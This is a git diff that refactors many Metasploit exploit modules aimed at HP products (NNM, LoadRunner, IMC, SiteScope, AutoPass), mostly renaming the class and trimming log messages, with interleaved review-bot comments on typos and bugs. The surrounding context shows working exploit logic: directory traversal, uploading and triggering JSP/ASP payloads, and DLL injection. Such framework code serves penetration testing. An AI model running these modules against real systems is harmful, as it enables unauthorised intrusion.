diff --git a/modules/exploits/windows/http/generic_http_dll_injection.rb b/modules/exploits/windows/http/generic_http_dll_injection.rb index 04c5ae4b94..0e80b7fef6 100644 --- a/modules/exploits/windows/http/generic_http_dll_injection.rb +++ b/modules/exploits/windows/http/generic_http_dll_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit = target_uri.to_s sploit << unc - print_status("#{peer} - Trying to ") + print_status("Trying to ") send_request_raw({ 'method' => 'GET', 'uri' => sploit diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb index ab30446ec0..2e0e944341 100644 --- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb +++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote dropper = jsp_drop_bin(war, war_traversal) dropper_filename = rand_text_alpha(8) + ".jsp" - print_status("#{peer} - Uploading the JSP dropper #{dropper_filename}...") + print_status("Uploading the JSP dropper #{dropper_filename}...") # The JSP, by default, is uploaded to: # C:\Program Files\HP\HP AutoPass License Server\AutoPass\LicenseServer\conf\pdfiles\ # In order to execute it, through the AutoPass application we would like to drop it here: 
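Review bot: In the `@@ -73,7` hunk of generic_http_dll_injection.rb the rewritten status line `print_status("Trying to ")` ends mid-sentence, so the log does not say what is being attempted. Since the line is already being edited, complete it with the value built just above, for example `print_status("Trying to request #{sploit}")`. The enclosing method starts outside the hunk.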
@@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote res.body.to_s.include?("java.lang.NullPointerException") && res.body.to_s.include?("com.hp.autopass") - print_error("#{peer} - Unexpected response... upload maybe failed, trying anyway...") + print_error("Unexpected response... upload maybe failed, trying anyway...") end res = send_request_cgi({ @@ -152,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res and res.code == 200 - print_error("#{peer} - Unexpected response after executing the dropper...") + print_error("Unexpected response after executing the dropper...") end 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8) + ".jsp"), diff --git a/modules/exploits/windows/http/hp_imc_bims_upload.rb b/modules/exploits/windows/http/hp_imc_bims_upload.rb index 8a17371a60..4396f25703 100644 --- a/modules/exploits/windows/http/hp_imc_bims_upload.rb +++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote #jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" - print_status("#{peer} - Uploading the JSP payload...") + print_status("Uploading the JSP payload...") res = send_request_cgi({ 'uri' => normalize_uri("/", "upload", "upload"), 'method' => 'PUT', 
@@ -93,13 +93,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.empty? - print_status("#{peer} - JSP payload uploaded successfully") + print_status("JSP payload uploaded successfully") register_files_for_cleanup("..\\web\\apps\\upload\\#{jsp_name}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri("/", "upload", jsp_name), 'method' => 'GET' diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb index e468efc285..169532851f 100644 --- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s - print_status("#{peer} - Uploading the JSP payload...") + print_status("Uploading the JSP payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"), 'method' => 'POST', @@ -96,13 +96,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.empty? - print_status("#{peer} - JSP payload uploaded successfully") + print_status("JSP payload uploaded successfully") register_files_for_cleanup(jsp_name) else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(jsp_name), 'method' => 'GET' 
diff --git a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb index c9fdac58ba..50e1585296 100644 --- a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb +++ b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] } @@ -109,11 +109,11 @@ class Metasploit3 < Msf::Exploit::Remote depth = datastore['DEPTH'] install_path = datastore['INSTALLPATH'] - vprint_status("#{peer} - Detecting tomcat version...") + vprint_status("Detecting tomcat version...") tomcat_version = get_tomcat_version if tomcat_version - print_status("#{peer} - Tomcat #{tomcat_version} detected... Verifying traversal...") + print_status("Tomcat #{tomcat_version} detected... Verifying traversal...") location = "" location << install_path location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/") 
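Review bot: The context line `location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/")` in the `@@ -109,11` hunk calls `ends_with`, which is not a core String method; core Ruby spells it `end_with?` and the ActiveSupport alias is `ends_with?` with the question mark. Unless the framework defines `ends_with` somewhere outside this diff, that line raises NoMethodError once a Tomcat version has been detected. `location << "\\" unless install_path.end_with?("\\", "/")` performs the same test in one call. The `@@ -151,16` hunk builds `location` the same way and ends just before the matching line, so it is worth checking there as well; both method bodies continue outside their hunks.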
@@ -122,19 +122,19 @@ class Metasploit3 < Msf::Exploit::Remote res = read_file(depth, location, "index.jsp") if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/ - vprint_good("#{peer} - Traversal exists and parameters are correct...") + vprint_good("Traversal exists and parameters are correct...") return Exploit::CheckCode::Vulnerable elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/ - vprint_warning("#{peer} - Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...") + vprint_warning("Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...") return Exploit::CheckCode::Appears else - vprint_status("#{peer} - Failed to verify the directory traversal...") + vprint_status("Failed to verify the directory traversal...") end else - vprint_error("#{peer} - Tomcat version not detected...") + vprint_error("Tomcat version not detected...") end - vprint_status("#{peer} - Checking if the vulnerable web service and method exist...") + vprint_status("Checking if the vulnerable web service and method exist...") res = send_request_cgi({ 'uri' => normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin'), 'vars_get' => { 'wsdl' => 1 } @@ -151,16 +151,16 @@ class Metasploit3 < Msf::Exploit::Remote depth = datastore['DEPTH'] install_path = datastore['INSTALLPATH'] - print_status("#{peer} - Retrieving the Tomcat version used...") + print_status("Retrieving the Tomcat version used...") tomcat_version = get_tomcat_version if tomcat_version.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to retrieve the Tomcat version used") else - print_good("#{peer} - Tomcat #{tomcat_version} found") + print_good("Tomcat #{tomcat_version} found") end - print_status("#{peer} - Verifying parameters to exploit the directory traversal...") + print_status("Verifying parameters to exploit the directory traversal...") brute_force = false location = "" location << install_path 
@@ -170,37 +170,37 @@ class Metasploit3 < Msf::Exploit::Remote res = read_file(depth, location, "index.jsp") if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/ - print_good("#{peer} - Traversal parameters are correct") + print_good("Traversal parameters are correct") elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/ - print_error("#{peer} - Traversal parameters are incorrect, will try to brute force depth...") + print_error("Traversal parameters are incorrect, will try to brute force depth...") brute_force = true else fail_with(Failure::Unknown, "#{peer} - Unknown error while verifying the traversal parameters") end if brute_force - print_status("#{peer} - Trying to brute force the traversal depth...") + print_status("Trying to brute force the traversal depth...") depth = brute_force_depth(location) if depth.nil? fail_with(Failure::BadConfig, "#{peer} - Traversal parameters are incorrect, try setting DEPTH and INSTALLPATH") end - print_good("#{peer} - Using #{depth} as depth length to exploit the traversal...") + print_good("Using #{depth} as depth length to exploit the traversal...") end jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" # It's uploading a JSP payload because AutoDeploy on the webapps directory isn't working on my tests - print_status("#{peer} - Uploading the JSP payload...") + print_status("Uploading the JSP payload...") res = upload_file(depth, location, jsp_name, payload.encoded) if res and res.code == 200 and res.body.to_s =~ /copyFileToServerResponse/ and res.body.to_s !~ /faultcode/ - print_status("#{peer} - JSP payload uploaded successfully") + print_status("JSP payload uploaded successfully") register_files_for_cleanup("..\\..\\#{location}\\#{jsp_name}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}...") + print_status("Executing payload 
on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}...") send_request_cgi({ 'uri' => normalize_uri('ServiceEmulation', jsp_name), diff --git a/modules/exploits/windows/http/hp_mpa_job_acct.rb b/modules/exploits/windows/http/hp_mpa_job_acct.rb index 4c5df23135..1049d6673b 100644 --- a/modules/exploits/windows/http/hp_mpa_job_acct.rb +++ b/modules/exploits/windows/http/hp_mpa_job_acct.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -219,16 +219,16 @@ class Metasploit3 < Msf::Exploit::Remote locations.each {|location| asp_location = location + asp_name - print_status("#{peer} - Uploading #{asp.length} bytes to #{location}...") + print_status("Uploading #{asp.length} bytes to #{location}...") res = upload(asp, asp_location) if res and res.code == 200 and res.body =~ /Results of Upload/ and res.body !~ /Object\[formFile\]/ - print_good("#{peer} - ASP Payload successfully wrote to #{location}") + print_good("ASP Payload successfully wrote to #{location}") payload_url = asp_location break elsif res and res.code == 200 and res.body =~ /Results of Upload/ and res.body =~ /Object\[formFile\]/ - print_error("#{peer} - Error probably due to permissions while writing to #{location}") + print_error("Error probably due to permissions while writing to #{location}") else - print_error("#{peer} - Unknown error while while writing to #{location}") + print_error("Unknown error while while writing to #{location}") end } @@ -239,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote # # EXECUTE # - print_status("#{peer} - Executing payload through #{payload_url}...") + print_status("Executing payload through #{payload_url}...") send_request_cgi({ 'uri' => payload_url}) end 
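Review bot: The last status line of the `@@ -170,37` hunk in hp_loadrunner_copyfiletoserver.rb reports `normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)`, but the `send_request_cgi` that follows requests `normalize_uri('ServiceEmulation', jsp_name)`. The console output therefore records a URI that is never requested, which misleads anyone reconstructing the run from the log. Assuming the requested URI is the intended one, build it once with `payload_uri = normalize_uri('ServiceEmulation', jsp_name)` and use it in both the message and the request. The method starts before the hunk and the request hash runs past its end.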
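Review bot: The rewritten error string in the `@@ -219,16` hunk of hp_mpa_job_acct.rb keeps a doubled word, `"Unknown error while while writing to #{location}"`, and the success line reads `"ASP Payload successfully wrote to #{location}"`. Both lines are touched by this commit anyway, so `print_error("Unknown error while writing to #{location}")` and `print_good("ASP payload successfully written to #{location}")` would fix the wording at no extra cost. The enclosing method starts outside the hunk.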
diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb index 4662a10c1d..2294c8b669 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb index acc7ebc703..11a8dad538 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb index 87bf5d4ac7..da06017e88 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb index 882ea4523a..e219d739fc 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb 
+++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -121,7 +121,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Keep-Alive' => '300', 'Connection' => 'Keep-Alive', 'Cache-Control' => 'max-age=0', - 'Content-Length' => data.length, 'Content-Type' => 'application/x-www-form-urlencoded', } }, 3) diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb index 17dc37c388..241ec0cf1a 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient @@ -82,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Keep-Alive' => '300', 'Connection' => 'Keep-Alive', 'Cache-Control' => 'mag-age=0', - 'Content-Length' => data.length, 'Content-Type' => 'application/x-www-form-urlencoded', } }, 3) diff --git a/modules/exploits/windows/http/hp_nnm_openview5.rb b/modules/exploits/windows/http/hp_nnm_openview5.rb index 303a6aa930..edff3b0c55 100644 --- a/modules/exploits/windows/http/hp_nnm_openview5.rb +++ b/modules/exploits/windows/http/hp_nnm_openview5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index 867dd837c6..e709be8cf0 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb 
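Review bot: The `@@ -82,7` hunk in hp_nnm_nnmrptconfig_schdparams.rb leaves `'Cache-Control' => 'mag-age=0'` in the header hash, while the sibling nameparams module in the `@@ -121,7` hunk sends `'max-age=0'`. This looks like a typo rather than a deliberate value; if so, `'Cache-Control' => 'max-age=0',` makes the two modules agree. If the misspelling is intentional, it deserves a comment saying why. The request hash starts outside the hunk.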
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index c0c7a84d27..8982d9bbbe 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb @@ -11,7 +11,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # =( need more targets and perhaps more OS specific return values OS specific would be preferred diff --git a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb index e9e798f40f..7981a0efbc 100644 --- a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb +++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb index f546994531..cdb57c968e 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb index 5b2d8df90d..8e7e3c1d2b 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb index e653bcf3c1..6ac18869d3 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb index 054d3c4090..bfe0674871 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_snmp.rb b/modules/exploits/windows/http/hp_nnm_snmp.rb index d2c98ea6ba..8632155f8a 100644 --- a/modules/exploits/windows/http/hp_nnm_snmp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb index 18fbdce2b0..e6c8376f02 100644 
--- a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/snmpviewer.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb index e233bfd79b..ebb5c95576 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb index 75609ae473..d53f58ec5b 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb index 44464a26e7..37d8c6bd7d 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ } 
diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb index 5dec29805a..47d8108ede 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/OpenView.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb index 691934ac8e..20514989eb 100644 --- a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb +++ b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb index e82552a092..e409da7372 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } 
@@ -115,19 +115,19 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting a valid session...") + print_status("Getting a valid session...") session = get_session if session.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to get a valid session") end - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") jsp = exploit_upload(session) unless jsp fail_with(Failure::NotVulnerable, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" }) end diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb index 11ae035e25..92ef605294 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } @@ -113,19 +113,19 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting a valid session...") + print_status("Getting a valid session...") session = get_session if session.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to get a valid session") end - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") jsp = exploit_upload(session) unless jsp fail_with(Failure::NotVulnerable, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" }) end diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb index db9a37d637..0f943908b5 100644 --- a/modules/exploits/windows/http/hp_power_manager_filename.rb 
+++ b/modules/exploits/windows/http/hp_power_manager_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_power_manager_login.rb b/modules/exploits/windows/http/hp_power_manager_login.rb index 3215be533a..2d4f0e3dd0 100644 --- a/modules/exploits/windows/http/hp_power_manager_login.rb +++ b/modules/exploits/windows/http/hp_power_manager_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb index b5f8e8b7af..61e4361241 100644 --- a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb +++ b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote session = get_authenticated_session_id(initial_session, redirect) csrf_token = get_csrf_token(session) - print_status("#{peer} - Executing payload") + print_status("Executing payload") random_mark = Rex::Text.rand_text_alpha(5 + rand(5)) res = send_request_cgi( { @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_initial_session_id - print_status("#{peer} - Retrieving an initial JSESSIONID...") + print_status("Retrieving an initial JSESSIONID...") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path.to_s, 'servlet', 'Main'), 'method' => 'POST' 
@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote end def authenticate(session_id) - print_status("#{peer} - Authenticating on HP SiteScope Configuration...") + print_status("Authenticating on HP SiteScope Configuration...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path.to_s, 'j_security_check'), @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_authenticated_session_id(session_id, redirect) - print_status("#{peer} - Following redirection to finish authentication...") + print_status("Following redirection to finish authentication...") res = send_request_cgi( { @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_csrf_token(session) - print_status("#{peer} - Getting anti-CSRF token...") + print_status("Getting anti-CSRF token...") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path.to_s, 'jsp', 'tabs.jsp'), 'cookie' => session @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote command = cmd_psh_payload(payload.encoded, payload_instance.arch.first) end - file = File.join( Msf::Config.data_directory, 'exploits', 